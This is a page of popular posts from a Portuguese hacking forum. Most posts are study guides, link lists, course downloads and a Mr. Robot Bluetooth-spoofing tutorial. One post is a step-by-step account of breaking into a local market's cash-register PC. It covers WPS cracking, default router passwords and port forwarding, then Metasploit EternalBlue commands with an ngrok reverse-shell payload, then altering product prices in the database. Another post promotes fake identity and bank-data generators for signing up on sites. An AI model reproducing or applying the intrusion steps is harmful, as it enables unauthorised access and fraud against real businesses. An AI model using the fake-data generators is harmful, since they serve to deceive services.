Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 07/18/18 in all areas

  1. 9 points
    Estamos aqui novamente rapaziada.... Hoje vamos falar sobre o que estudar para ser um bom caçador de bugs ou caçador de recompensas (COMO PREFERIR). Vamos primeiro desmistificar alguns mitos: 1- "BUG HUNTER É MAIS CAPACITADO DO QUE UM PENTESTER " /// Bug Hunter = Etical Hacker = Pentester. (WTFF?!?!?!?!?)) "Bug Hunter" é o termo dado para alguém que procura bugs em algum software em busca de recompensa (um pentester também, porém possui um tempo limitado e pode ser pago caso não encontre algo ) e ele utiliza as mesmas técnicas que um Pentester utiliza/utilizaria para realizar seu Teste de Intrusão. Existem SIM! Bug Hunters que são muito mais capacitados do que um Pentester, assim como também existe o contrário. 2- "VOU FAZER BUG PORQUE POIS DÁ MAIS DINHEIRO" /// Não é bem assim que funciona... Um Pentester pode ganhar bem mais do que um Bug Hunter, assim como o contrário. No caso de Bug Hunters, você recebe de acordo com a criticidade da vulnerabilidade (e onde) que você encontrou. O Pentester (se fizer parte de uma empresa) começará ganhando X e dependendo do seu desempenho poderá ganhar mais ou menos (). 3- "TAL BUG HUNTER TRABALHOU UMA NOITE E GANHOU $30.000" /// NÃO, NÃO E NÃO. Esse valor que foi pago, não foi por aquela semana/noite que ele passou procurando. Esse valor é fruto de todo conhecimento que foi adquirido ao longo do tempo que ele dedicou. 4- "POSSO SER BUG HUNTER E PENTESTER AO MESMO TEMPO" /// Sim, como já foi tido, Bug hunter nada mais é do que um pentester que realiza testes em busca de vulnerabilidades em softwares. Você pode sim ter um emprego na área de Segurança sendo um Pentester e fazer Bug Bounty no tempoo livre, tanto por diversão, quanto para aumentar sua renda. (). Você pode também ser aquele cara que sempre faz Bug Bounty, e além de caçar bugs nos programas das empresas, oferecer um serviço de Pentest para alguém. Bom, acho que os principais mitos foram falados, então vamos ao conteúdo. Já vimos que um Bug Hunter nada mais é do que um Pentester que busca bugs em empresas que possuem um programa de Bug Bounty. Então seguindo a lógica, podemos utilizar OS MESMOS CONTEÚDOS DE PENTEST para estudar, aprender, praticar e ir caçar seus bugs. Primeiro de tudo, o que seria de um Pentester sem as bases da segurança da informação? Não o CIDA, mas as bases que fazem com que a Segurança da Informação seja importante. Estou falando de Programação, Redes, Sistemas Operacionais, etc etc. E tendo esse princípio, iremos focar aqui no Pentest/Bug Bounty em Aplicações Web (no qual é o meu foco). Começando pela Programação, é difícil falar a você qual a melhor linguagem para ser estudada (JAVA NÃO É). O que eu recomendo é que você comece lá de baixo e ir evoluindo, dessa forma: HTML -> É interessante estudarmos HTML para entender como um site é estruturado, seus elementos, e também os tipos que ataque que o envolve. CSS -> Não muito diferente do HTML, é legal aprendermos pois o CSS hoje, nos possibilita utilizá-lo como vetor de ataque. Como exemplo deixo esse report de uma falha que utiliza o CSS como vetor de ataque => CSS Injection on /embed/ via bgcolor parameter leaks user's CSRF token and allows for XSS JAVASCRIPT -> Aqui, é extremamente importante que você conheça a fundo JavaScript, tanto pelos ataques que o envolvem, quanto pelos seus frameworks e plataformas que são criados e utilizados (criando muita força) tanto no Front-End quanto no Back-End. PHP -> Acho interessante estudar sobre pois ainda é altamente utilizado nos sites, por ser uma linguagem Server-Side, por ser fácil e por conter muito conteúdo na NET. SQL -> É essencial que seja aprendido o SQL devido ao fato de que quase todas as aplicações hoje utilizam algum banco de dados (relacional) para guardar suas informações. Python -> Recomendo o Python por ser uma linguagem muito fácil, poderosa e pode te ajudar bastante quando você precisar desenvolver alguma coisa rápida (claro que vai variar de programador para programador). XML -> Como assim XML??? Segue o mesmo princípio do HTML, você deve estudar para entender como determinados ataques funcionam, como por exemplo: XXE in Site Audit function exposing file and directory contents JAVA -> Por ser multiplataforma, e permitir que você decompile alguma biblioteca de forma mais fácil e legível para buscar vulnerabilidade como a que foi descoberta pelo João Matos (sou um grande fã) esse ano. CVE-2018-14667 Muitas outras tecnologias que existem, fica ao seu critério. Recomendo fortemente estudar as tecnologias que estão sendo utilizadas no site que você está procurando por vulnerabilidades. Um plugin que utilizo bastante para isso é o Wappalyzer. Partindo para Redes, é indispensável o conhecimento na área, pois você precisa entender como a internet funciona, como as aplicações se comunicam, como os protocolos conversam, quais regras são utilizadas etc. Protocolos de Transmissão como TCP/UDP -> É necessário ter conhecimento da base da internet, como os dados são trafegados e entreges etc. Protocolos de Aplicações (SSH, Telnet, HTTP) -> Toda aplicação utiliza algum protocolo para se comunicar, são inúmeros e cada um com suas devidas regras. Em especial, recomendo estudar fortemente o procotolo HTTP, pois ele possui diversos métodos, diferentes versões, e inúmeros Headers que você precisa entender como funcionam para tirar proveito e utilizar como vetores de ataque. Todos os outros assuntos que envolvem redes são bem vindos, pois dependendo da aplicação que você irá testar, você precisará entender como o protocolo dessa aplicação funciona. Indo pro último, mas não menos importante são os Sistemas Operacionais. Linux -> É essencial que você tenha conhecimentos relacionados ao sistema operacional do pinguim, pois é fortemente utilizado em servidores, e dependendo de cada distribuição, algumas coisas podem mudar. É muito importante que você entenda como funciona cada sistema operacional, pois haverá situações nas quais você poderá ter acesso à algum e precise de seus conhecimentos para realizar determinada ação. Windows (IMAGINEM QUE O EMOTICON É UMA JANELA. "ABSTRAÇÃO") -> Máquinas com esse sistema operacional também são utilizadas em diversos servidores espalhados ao redor do mundo, não diferente do Linux, você deve entender como funciona o sistema para conseguir realizar determinadas funções que sejam necessárias para dar continuidade ao seu Bounty. FreeBSD -> FreeBSD ainda é utilizado para servidores, e como os outros sistemas descritos, você precisará entender como ele funciona. PRATIQUE CTF, LEIA REPORTS, LEIA WRITEUPS, TUDO ISSO PODERÁ AJUDAR VOCÊ A DESENVOLVER SEU MINDSET. Após pesquisar em vários lugares (fórum do BugCrowd) resolvi colocar aqui materiais para que vocês possam estudar e começarem a fazer seus programas de Bug Bounty. LIVRO (Inglês) -> The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws (Dafydd Stuttard,‎ Marcus Pinto) OBS: eu traduzi ele por completo, se quiserem eu passo o link para vocês. LIVRO (Português) -> Testes de Invasão - Uma Introdução Prática ao Hacking (Georgia Weydman) LIVRO (Português) -> Pentest em Aplicações Web (Daniel Moreno) LIVRO (Inglês) -> Owasp Testing Guide (Owasp) LIVRO (Inglês) -> Web Hacking 101 - How to Make Money Hacking Ethically (Peter Yaworski) CURSO (Inglês) -> Hacker101 (HackerOne) CURSO (Inglês) -> Bugcrowd University (BugCrowd) WRITEUP DAS FALHAS EXPLICADAS (Inglês) -> Pentester Land REPORTS DIVULGADOS (Inglês) -> HackerOne CANAL NO TELEGRAM SOBRE REPORTS (Inglês) -> Bug Bounty Channel BOT DE DIVULGAÇÃO DE RELATÓRIOS (Inglês) -> Public Disclosure Bot PAPERS SOBRE CTF/BUGBOUNTY (Português) -> Hackaflag Papers - Hackaflag Academy Bom galera, acho que por hoje é só. Espero que tenha despertado o interesse em vocês. Qualquer dúvida, sugestão, correção, discussão, se você não concorda em alguma coisa deixa aí nos comentários, tudo é bem-vindo !!!!
  2. 8 points
    E ae galera, trago pra vocês uns materiais para estudo. Nada de apostila, tudo pela internet. Eu peguei o básico do básico e reuni. Não precisa estudar todo dia, toda hora, estudem quando tiver vontade. É serio, uma hora você vai falar "agora eu vou estudar", espere esse momento chegar. Eu segui dessa seguinte maneira: GNU/Linux > Redes > Programação > Hacking. Vamos lá. No nosso repositório você encontra de tudo, todo tipo de material. Link do nosso repositório http://pc.cd/VfbotalK Senha: issonaoehumasenha5/9 INTRODUÇÃO AO GNU/Linux INTRODUÇÃO -> https://goo.gl/Sjih4K CURSO GNU/Linux -> https://goo.gl/SlZgwD DOMINANDO O TERMINAL -> https://goo.gl/Ka6Uu1 A ARVORE DE DIRETÓRIO DO LINUX -> https://goo.gl/g5SmeI INTRODUÇÃO AO BÁSICO DO BÁSICO DE REDES: TCP/IP -> https://goo.gl/XPNEH9 UDP -> https://goo.gl/1M5SYF DIFERENÇA DE TCP E UDP -> https://goo.gl/j0MtY0 HUB, SWITCH, ROTEADOR E MODEM -> https://goo.gl/SAQbkI BRIDGE -> https://goo.gl/Wu4hcj NAT -> https://goo.gl/c8NjHH DNS -> https://goo.gl/bsMdUR GATEWAY -> https://goo.gl/OFOkkZ DHCP -> https://goo.gl/5gnZrc LISTA DE PROTOCOLOS DE REDES -> https://goo.gl/EJ1YvZ CURSO DE REDES -> https://goo.gl/XijVVc INTRODUÇÃO A PROGRAMAÇÃO LOGICA DE PROGRAMAÇÃO -> https://goo.gl/9GNGHs PYTHON -> https://goo.gl/xkzYkk C -> https://goo.gl/KYgUKn C# -> https://goo.gl/C4zvN0 C++ -> https://goo.gl/HuhBSs PHP -> https://goo.gl/LymDBl RUBY -> https://goo.gl/kgcA1g JAVA -> https://goo.gl/q0sGmN HACKING SOU INICIANTE, QUERO SER HACKER, POR ONDE COMEÇO -> https://goo.gl/TiM39Y OS PRIMEIROS PASSOS DE UM HACKER INICIANTE -> https://goo.gl/BLIM5k COMO SER UM HACKER DE SUCESSO -> https://goo.gl/QrgQjW COMO FUNCIONAM OS CYBER ATAQUES PARTE 1 -> https://goo.gl/55SDY4 COMO FUNCIONAM OS CYBER ATAQUES PARTE 2 -> https://goo.gl/QYaRHc KOSHIMARU KISARA - INTRODUÇÃO AO CURSO HACKER -> https://goo.gl/2rl55d CAVEIRATECH - INTRODUÇÃO AO HACKING E PENTEST -> https://goo.gl/KsTfvw ANONIMATO -> Anonsurf: https://goo.gl/vEyWOu && Whonix: https://goo.gl/VSajTM CANAIS COM CONTEUDO DE TECNOLOGIA/HACKER -> https://goo.gl/TB4px8
  3. 4 points
    Estou de volta com os desafios! Quem quiser participar, aprender, brincar... Chega junto! https://desafio-fsociety.webcindario.com
  4. 4 points
    Cerca de 29GB de dados no site do Wikileaks. https://file.wikileaks.org/file/ https://file.wikileaks.org/torrent/
  5. 4 points
    Dicionário Hacker. Créditos TheCyberTeam DicionarioHacker(TheCybersTeamv1.1).pdf
  6. 4 points
    Aqui tem varios cursos incluindo 137 cursos da Alura Bons estudos http://listaodownloadcursos.blogspot.com/ Alguém tem o duplique seu salario Seiti Arata?
  7. 3 points
    Achei esse fonte que fiz a um bom tempo: um programinha que criptografa arquivos. Você pode usá-lo em arquivos de qualquer extensão: .jpg, .gif, .txt, .rar, .wav, .pdf, .odt, etc... Exemplo: [email protected]:~$ ./cripto fsociety.jpg será criado um arquivo fsociety.jpg.cripto O inverso: [email protected]:~$ ./cripto fsociety.jpg.cripto Caso queiram mudar a regra para criptografar/descriptografar, vejam as linhas (que estão em cifra de caesar 3): while((c = getc(a)) != EOF) putc(c + 3, b); while((c = getc(a)) != EOF) putc(c - 3, b); Com exceção de arquivos de texto, não fica muito óbvio qual criptografia está sendo usada. #include #include int main(int argc, char *argv[]) { int c, t; char ext[6], out[100] = ""; FILE *a, *b; if(argc != 2) { printf("\nUse: ./cripto file\n"); printf("Examples:\n"); printf("Encrypt a file:\n"); printf("./cripto image_file.jpg\n\n"); printf("Decrypt a file:\n"); printf("./cripto image_file.jpg.cripto\n\n"); return 0; } t = strlen(argv[1]); ext[0] = argv[1][t-6]; ext[1] = argv[1][t-5]; ext[2] = argv[1][t-4]; ext[3] = argv[1][t-3]; ext[4] = argv[1][t-2]; ext[5] = argv[1][t-1]; if(strcmp(ext, "cripto")) { a = fopen(argv[1], "r"); strcat(out, argv[1]); strcat(out, ".cripto"); b = fopen(out, "w"); while((c = getc(a)) != EOF) putc(c + 3, b); /* caesar cipher */ } else { a = fopen(argv[1], "r"); argv[1][t-7] = '\0'; strcat(out, argv[1]); b = fopen(out, "w"); while((c = getc(a)) != EOF) putc(c - 3, b); /* caesar cipher */ } fclose(a); fclose(b); return 0; }
  8. 3 points
    Um fodendo Pack de livros sobre Psicologia e Psicanálise https://mega.nz/#F!UCIjka7K!adIUwh8jClw9uPjTH34YkA
  9. 3 points
    Curso de PHP do Zero ao Profissional - Bonieky Lacerda‎ Tamanho Total: 21.3 GB Formato dos Arquivos: MP4/M4V Links: Parte 1:Download Parte 2: Download Parte 3:Download *Caso alguns videos não executar instale o K-Lite codec*
  10. 3 points
    Ladies and Gentlemen, é com enorme prazer que lhes anuncio um acontecimento histórico. O Lançamento da Primeira Maratona Hacker da Fsociety Brasil. Após fecharmos parceria com a Desec Security, ela nos disponibilizou um voucher para que pudéssemos disponibilizar entre os membros da Fsociety Brasil, sendo assim, eu me reuni comigo mesmo e foi decidido por unanimidade que deveria ser criada uma Hackathon, cujo prêmio será a formação Pentester Profissional desta que é uma das maiores empresas de Segurança da Informação do Brasil. Além da Desec Security a Sinergia Consultoria e Soluções também está apoiando o evento e disponibilizou um ingresso para um dos Roadsecs Regionais ou então para a versão final do Roadsec São Paulo 2018, consulte a premiação no link abaixo. Confira a descrição, regras e FAQ no repositório oficial do Projeto: https://github.com/fsocietybrasil/hackathon-fsociety-2018 Interessados em participar devem antes de tudo ler as regras e indicações, em seguida escolher um dos temas listados e após concluir seu projeto, deve enviar um e-mail para [email protected] com o assunto "Hackathon Fsociety Brasil", neste e-mail devem estar descritos: Informações sobre o projeto Repositório com o código fonte para que possamos avaliá-lo Instruções de uso, instalação e configuração do mesmo. Obrigado aos apoiadores e boa sorte aos competidores!
  11. 3 points
    Ladies and Gentlemen, é com enorme prazer que lhes apresento a nossa nova campanha de criação de conteúdo. Vamos sortear 1 camiseta ao final de cada mês para os membros que mais criaram conteúdo em nosso Fórum, a fim de incentivar a comunidade a criar mais conteúdo e divulgar os eventos da cultura hacker pelo nosso país. Abaixo segue o primeiro modelo que sortearemos, é uma camiseta da comunidade Inurl Brasil, como no modelo abaixo.
  12. 2 points
    Site com geradores de um monte de coisa: CPF, Endereço, Dados de pessoas completos, contas bancárias, etc. Gerador Acreditem, já vi sites caírem nesses dados falsos. Se não me engano o site "A casa das brasileirinhas" aceitava esses dados, durava 3 dias até cair a conta.
  13. 2 points
    Area31 e uma de suas pesquisas sobre o biohacking "Iniciamos as pesquisas com um biochip implantável no final de 2013, após convite do AmalGraafstra por email ao area31 hackerspace, e ficamos surpresos após testes iniciais. O biochip implantável possui um tamanho muito reduzido, com dimensão de 2mm x 1,2 mm (aproximadamente do tamanho de um grão de arroz), é revestido com um vidro biocompatível Schott 8625, e não requer bateria ou qualquer alimentação elétrica para seu funcionamento. Passadas as etapas de homologação e testes de resistência física e segurança do biochip, decidi realizar a implantação do modelo xEM que usa o protocolo RFID para comunicação. Optei por esse modelo devido a existência de uma ampla gama de equipamentos compatíveis já em uso no mundo, que vão de catracas para controle de acesso a antifurtos automotivos ou mesmo sistemas de bilhetagem existentes em metrôs e ônibus. Após tentativas frustradas de implantação junto a médicos profissionais que se recusaram a implantar o biochip por medo de perda do CRM, pesquisei alguns estudios de modificação corporal em Belo HorizonteMG e decidi realizar a implantação do biochip com o profissional Rafael Dias, no estúdio OldLinesTattoo Shop no dia 03 de março de 2014. O procedimento foi bem simples e durou menos de dois minutos, sendo basicamente implantado com o auxílio de um cateter, aplicando o chip abaixo da pele. Como o biochip tem o tamanho de um grão de arroz, a perfuração feita para a implantação é mínima, facilitando a cicatrização. No dia seguinte não havia nenhuma dor ou incômodo, e eu utilizei a mão normalmente para uso em computadores sem transtornos. Segue os vídeos do procedimento de implantação: Parte 1: As aplicações práticas para o biochip são autenticação em computadores pessoais, servidores, ou equipamentos eletrônicos diversos, abertura de catracas eletrônicas, bilhetagem em transportes púbicos (metrô, ônibus, etc), abertura de portas de carros, anti-furto para ignição de carros, barcos, aviões, acessibilidade facilitada a pessoas com dificuldades motoras, ou mesmo adicionando uma camada de segurança a uma senha existente, por exemplo, adicionando o código do biochip ao final da senha existente, aumentando o tamanho de caracteres da mesma e criando uma dificuldade maior de quebra da senha. Eu particularmente costumo usar a TAG do biochip no fim da senha de algum serviço, e como eu tenho uma senha diferente para cada serviço, eu criei um padrão teoricamente seguro de senhas pessoais, onde o nome do serviço faz parte da senha, obrigando a ter uma senha para cada serviço. Ex: [email protected] para o Facebook, ou posso usar a senha [email protected] para o Twitter, bastando digitar o início da senha, e passando o biochip no leitor para finalizar a senha em si. Esta possibilidade de segurança ampliada com o uso da TAG do biochip como parte da senha fica mais expressivo quando se usa a tecnologia NFC em contrapartida ao RFID visto que o modelo xNT que usa NFC possuir uma área gravável que varia de 144bytes a 800bytes de capacidade de armazenamento, proporcionando que se use uma imagem (QR Code) na área gravável, tornando a senha humanamente impossível de ser digitada, ou também pode-se optar por uso de um certificado digital assinado semelhante a forma de autenticação usando um pendrive conectado a um computador para emissão de nota fiscal eletrônica no país. Contatos Raphael Bastos Yaxkin/Gentoo Linux - http://downloads.hackstore.com.br Wiki Hackstore - http://wiki.hackstore.com.br Área 31 Hackerspace - http://www.area31.net.br Kankin/Funtoo Linux - http://kankin.area31.net.br"
  14. 2 points
    Olá venho mostrar como fiz para entrar no computador do mercadinho remotamente, foi o primeiro passo antes deu alterar o preço do cigarro para 4 reais (antes era R$ 8,50 ja faz 5 dias e nada foi alterado ), Passos: Entrar na rede Mapear a rede & encontrar o caixa Encontrar vulnerabilidades Redirecionar portas do caixa para WAN Invaindo o caixa Passo 1 Como voce não vai poder simplesmente se conectar a LAN , o padrão é tentar fazer uma conexão por Wi-fi, no meu caso a rede tinha WPS ligado, então usando o WPS App para encontrar o pin da rede para que eu possa conectar, voce pode usar varias ferramentas para tentar fazer ter conexao num wifi, Passo 2 Utilizei um app chamado Network Scanner para fazer uma varredura na rede, com isso você pode pegar cada dispositivo conectado a rede, procure por computadores na rede, no meu caso só existe 1 caixa no mercadinho e com isso foi facil descobrir qual dos hosts era e lembre-se reconhecer o sistema que está rodando, se for Windows você tem mais chances de conceguir, aproveite e pegue também o endereço do Gateway no caso: 192.168.1.1 //Simulaçao Passo 3 Ainda no Network Scanner, verifique as portas do computador , verifique se existe alguma porta vulneravel, no meu caso a 445 pode ser vulneravel ao terrivel EternalBlue e como o mercado não é muito grande provavelmente não fazem atualizaçao o sistema no sistema, oque pode ser um error fatal não deixar seu sistema atualizado, Passo 4 Entre no navegador e entre no gateway (Geralmente 192.168.1.1 ou 192.168.0.1), provavelmente irá pedir login ou senha, você pode tentar usar o routersploit no android para poder encontrar o login e senha do roteador, mas você pode fazer testes rapidos em logins padroes (Lista abaixo) , assim que conceguiu acesso ao roteador você precisa liberar portas para o ip do caixa (lembre de redirecionar para o IP do caixa) geralmente uma pagina chamada Port Forwarding, achou? entao adicionar uma nova regra e Porta Publica (Public Port) use portas entre 1001-9999 pois a maioria dos scanners de portas scaneia de 1-1000 e em Porta Privada (Private Port) voce irá colocar a porta que se encontra uma possivel vulnerabilidade no meu caso 445 e no protocolo (protocol) voce coloca TCP , e aumentar a chance nenhuma outra pessoa achar esse caminho, caso tenho dificuldades para liberar portas no roteador aproveite a internet gratis e pesquisa como abrir portas usando o modelo do roteador (que pode ser facilmente encontrado fusando no painel) Logins padrao: admin admin admin (SENHA EM BRANCO) admin gvt12345 guest guest Passo 5 Antes de ir embora para casa aproveite e pegue o IP WAN da rede, facilmente encontrado no site: MyIP org ou MeuIP br, em casa já com o café do lado, abra um bloco de notas e grave suas informaçoes nela ex: 164.216.21.3:4444 -> 192.168.1.21:445, bom vamos ver se realmente é vulneravel ao ataque do eternalblue , abra o metasploit e use smb_ms17_010 para checar se é vulneravel, exemplo do meu caso: RHOSTS: 164.216.21.3 RPORT: 4444 comandos abaixo. msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 164.216.21.3 set RPORT 4444 exploit caso o retorno ter Host is likely VULNERABLE to MS17-010! é vulneravel como no meu caso abaixo: [+] 164.216.21.3:4444 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 164.216.21.3:4444 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Boa agora vamos explorar essa vulnerabilidade use o exploit windows/smb/ms17_010_eternalblue para invadir, no meu exemplo irei usar o ngrok para fazer tunnel com o meu localhost (APRENDA USAR O NGROK AQUI ) utilizarei o payload windows/meterpreter/reverse_http use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 164.216.21.3 set RPORT 4444 set LHOST 0.tcp.ngrok.com set LPORT 46707 exploit Pronto, agora estude o computador, meus passos para alterar o banco de dados: Naveguei até a area de trabalho, verifiquei todos os links, e vi que tinha um chamado Sis comerce, baixei o executavel dele, decompilei ele com o .NET Reflector, verifiquei que ele faz conexão com o banco de dados da Microsoft SQL Server, usando o mono desenvolvi uma ferramenta para conectar no banco usando os dados que decompilei (Existe uma classe conectora do DB contendo host, user...) só apliquei a mesma coisa no mono, simplesmente atualizei o preço de todos os produtos com o nome "CIGARRO DE PALHA MINAS" para 4.00. Videos que podem ajudar:
  15. 2 points
    Bom dia pessoal! Tenho 21 anos e como iniciante em programação gostaria de obter algumas respostas. Vou direto ao ponto. Sendo programador você também é um hacker? Se sim, qual linguagem usa-se normalmente? Já ouvi falar que Python, php são fundamentais mas como dito anteriormente sou iniciante. Claro que isso se possível tem que ser muito bom e depois de manjar em programação tenho que estudar pentest.. enfim, obrigado desde já.
  16. 2 points
    Bom dia! Eu sou um programador atualmente eu estou na programação de aplicações android (jogos), mas eu também estou muito interessado em segurança de computador. É um mercado em crescimento que vejo muito futuro. Espero aprender e estar atualizado neste fórum!
  17. 2 points
    #RESPOSTANDO MEU POST DO FACEBOOK! [Material / Conteúdo / PDF's / Livros de TI] - Olá soldados de plantão. Hoje vou compartilhar uns PDF's de TI com vocês. ( Espero que gostem ) Guia do Hacker Brasileiro: https://drive.google.com/file/d/0Bx_3hSudn5BhOW5MazBfX3VsakU/view ________________________________________________________________________________________________________ Tópicos Introdutórios em Computação Forense: https://drive.google.com/file/d/0Bx_3hSudn5BhUVRjQ3dLVnM2MjQ/view _______________________________________________________________________________________________________ Curso de Linguagem PHP: https://drive.google.com/file/d/0Bx_3hSudn5BheVpFSXdEVURraXM/view ______________________________________________________________________________________________________ O livro Secreto: https://drive.google.com/file/d/0Bx_3hSudn5BhZmV1S1Zkd3JmYzQ/view ____________________________________________________________________________________________________ Livro Proibido/Curso de Hacker: https://drive.google.com/file/d/0Bx_3hSudn5BhT3lUM0FYZmloYTA/view __________________________________________________________________________________________________ Java Básico Intermediário: https://drive.google.com/file/d/0Bx_3hSudn5BhWExIWkNzS2F6U3c/view _______________________________________________________________________________________________ A Arte de Invadir: https://drive.google.com/file/d/0Bx_3hSudn5BhaXpIV1UwajNNTTg/view _____________________________________________________________________________________________ As Armas da Persuasão: https://drive.google.com/file/d/0Bx_3hSudn5BhcDBVanFZa3A1TUU/view ____________________________________________________________________________________________________________________ Introdução ao Prompt de Comando do Windows (CMD): https://drive.google.com/file/d/0Bx_3hSudn5BhWXFTWmFYdVdTT1k/view ____________________________________________________________________________________________________________________ - Loock Underwood
  18. 2 points
    Fiz um vídeo sobre o onionscan, explicando a teoria e a prática da ferramenta. Abre e da like, 50 faço continuação.
  19. 2 points
    Olá, as aulas estão voltando, e estou indo para o 1 ano do ensino médio, queria saber se conhecem algum livro ou apostila bom, que me ajude para estudar. Farei uma prova de enturmação, de português, matemática e inglês, inglês eu já sou bom, mas o resto preciso de ajuda! Obrigado desde já !
  20. 2 points
    bom no momento em que vc faz a conexao vc ja ta requisitando um pacote entao isso e basicamente a mesma coisa o que muda e o tipo de pacote que vc vai envia se vai ser tcp udp SYN...
  21. 2 points
    Curso de Inglês Mairo Vergara 4.0 24 Módulos Tipo de arquivo: Torrent Tamanho do arquivo Torrent: 309.64KB Tamanho do arquivo baixado: 23.1GB Servidor: MEDIAFIRE LINK: DOWNLOAD *Aguarde 5 segundos e feche a propaganda* Tem Bastante seeds aproveitem! Se o link estiver OFF, avise nos comentários!
  22. 2 points
    Já dei inicio ao projeto, segue o LINK DA PLAYLIST. Espero ajudar, quem queira !
  23. 2 points
    https://drive.google.com/drive/folders/0BzaTvtY-IGcpekJGYUwyZ09MRHM
  24. 2 points
    A conta fica logada por que sua sessão fica aberta no servidor deles. Não há armazenamento das credenciais na sua máquina a não ser que você escolha salvar naquela "caixa de mensagem" ou esteja com algum keylogger.
  25. 2 points
    Bem vindo. É muito bom você aprender sobre tudo mas sugiro que foque em algo pois no que focar vai ser seu ponto mais forte. Com o tempo você fica bom em tudo mas se torna especialista em algo.
  26. 2 points
    Mr. Robot, episódio 6. Como de costume, não decepcionante. Mais uma vez, nosso herói, Elliot, usou seu extraordinário intelecto e habilidades de hacking para nos inspirar. Neste episódio, Elliot está sendo chantageado pelo traficante de drogas implacável, Vera, para tira-lo da prisão. Shayla esta sendo refém e Elliot tem até a meia-noite para invadir o sistema de computador da cadeia para liberá-lo. Elliot tenta explicar a Vera que tal invasão não pode ser feita em questão de horas, mas sim dias ou semanas para encontrar uma vulnerabilidade de segurança que ele possa explorar. Pendrive malicioso Em sua primeira tentativa de invadir a prisão, Elliot e Darlene, sua parceira da Fsociety, "acidentalmente" deixam cair pendrives infectados perto da prisão. A estratégia aqui é que se alguém dentro da rede da prisão pegar um e inseri-lo no seu sistema de computador, irá ter injetado um malware e assim dando uma entrada para Elliot. Como esperado, um oficial pegou um e inseriu em seu computador. Elliot foi capaz de ter uma conexão remota, mas antes de poder fazer qualquer coisa, o software AV (antivírus) detecta a intrusão e desconecta Elliot. Elliot então questiona Darlene por ela ter pego um malware já conhecido (pelos antivírus, no caso), ao invés de desenvolver um próprio malware e então Darlene se defende dizendo que só tinha meia-hora. A rede Enquanto Elliot está visitando Vera na prisão, ele traz seu telefone com ele, no qual ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos estão usando WPA2. Embora ele saiba que pode quebrar WPA2, porem o tempo é curto para que ele possa fazer um bruteforce na rede. No processo de descoberta de hotspots sem fio e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando o carro de um agente passa perto dele. Isso estimula Elliot a uma nova estratégia, invadir o Bluetooth e entrar no sistema de computador da prisão através da conexão dedicada do carro da policia à prisão. A estratégia de Elliot aqui é falsificar a conexão Bluetooth do carro da polícia com o teclado. Se ele pode fazer o laptop acreditar que seu teclado é realmente o teclado do policial, ele pode controlar o laptop do policial e entrar na rede da prisão. Uma vez dentro da rede, ele pode enviar malware para assumir o controle dos sistemas controlados digitalmente da prisão. Ativando o Bluetooth Antes que Elliot possa fazer qualquer coisa, ele precisa habilitar o Bluetooth em seu sistema: service bluetooth start Em seguida, ele precisa ativar o dispositivo Bluetooth: hciconfig hci0 up Então ele verifica se ele realmente está funcionando, digitando: hciconfig hci0 Observe o "Endereço BD" na segunda linha - este é o endereço MAC do dispositivo Bluetooth. Procurando dispositivos Bluetooth A primeira coisa que Elliot no processo de invasão é procurar conexões Bluetooth. Se você olhar de perto a tela de Elliot, você pode ver que ele está usando o hcitool, uma ferramenta de configuração Bluetooth integrada no Kali Linux. Embora isso funcione, tive um melhor desempenho com o btscanner, um scanner Bluetooth. Para usá-lo, digite: btscanner Em seguida, selecione "i" para iniciar uma verificação de inquérito. Você pode ver os resultados abaixo. Usando o btscanner, podemos obter uma lista de todos os dispositivos Bluetooth por perto. Este aqui tem um endereço MAC e um nome de "Tyler" - para falsificar este dispositivo, devemos falsificar o endereço MAC e o nome do dispositivo. É assim que Elliot recebe o endereço MAC e o nome do dispositivo Bluetooth do carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um alcance de apenas cerca de 10 metros (embora com uma antena direcional, distâncias até 100 metros foram alcançadas). Spoof o endereço MAC do teclado Agora que Elliot tem o nome e o endereço MAC do teclado do policial, ele precisará clonar o teclado do policial com essas informações. O Kali Linux possui uma ferramenta projetada para spoof de dispositivos Bluetooth chamados de spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este: spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537 -i Determina o dispositivo, neste caso hci0 -a Determina o endereço MAC que queremos falsificar -n Determina o nome do dispositivo que queremos falsificar, neste caso "Car537" Se o fizermos corretamente, nosso dispositivo Bluetooth irá falsificar o endereço MAC e o nome do dispositivo Bluetooth do computador do policial. Para verificar se foi bem sucedido, podemos usar o hciconfig seguido do dispositivo e o "nome" do switch que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que estamos tentando emular com o dispositivo Bluetooth do carro de polícia. Se tivermos sucesso, ele terá o mesmo endereço MAC e o nome do dispositivo Bluetooth do policial. hciconfig hci0 name Agora, temos um dispositivo Bluetooth que é um clone perfeito do teclado Bluetooth do carro da polícia! O link do serviço bluetooth para o laptop do policial Agora é aqui onde o roteiro e realidade de Mr. Robot se divergem. O hacking de Mr. Robot é realista, porém as vezes, o diretor precisa deixar as coisas um pouco mais fictícias. E isso é permitido pois as obras não devem se limitar pela realidade. Para que o Eliot se conecte agora ao laptop do carro de polícia, ele precisaria da chave de link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado) que foi trocada entre o teclado e o adaptador Bluetooth no laptop. Ele poderia adivinhar (improvável) ou crack-lo, mas não será tão rápido como apareceu no show. Outra possibilidade é que, quando o sistema foi reiniciado ou o teclado foi desconectado, Elliot pode se conectar ao laptop, pois é um clone do teclado do policial. Em ambos os casos, levaria mais tempo do que Elliot tinha neste episódio para cortar o teclado Bluetooth do policial. Hackeando a prisão Na etapa final, Elliot usa o computador hackeado do policial para fazer upload de um malware via FTP, que lhe dará o controle das portas das celas da prisão. Poucas pessoas sabem que prisões e outros sistemas industriais, muitas vezes usam SCADA (Sistemas de Supervisão e Aquisição de Dados). Estes sistemas industriais possuem PLCs. Presumivelmente, essa prisão tinha PLCs controlando as portas das celas da prisão (uma suposição muito razoável) e o malware de Elliot infectou-os e lhe deu controle, permitindo-lhe abrir todas as celas, liberando Vera e todos os outros prisioneiros.
  27. 2 points
  28. 2 points
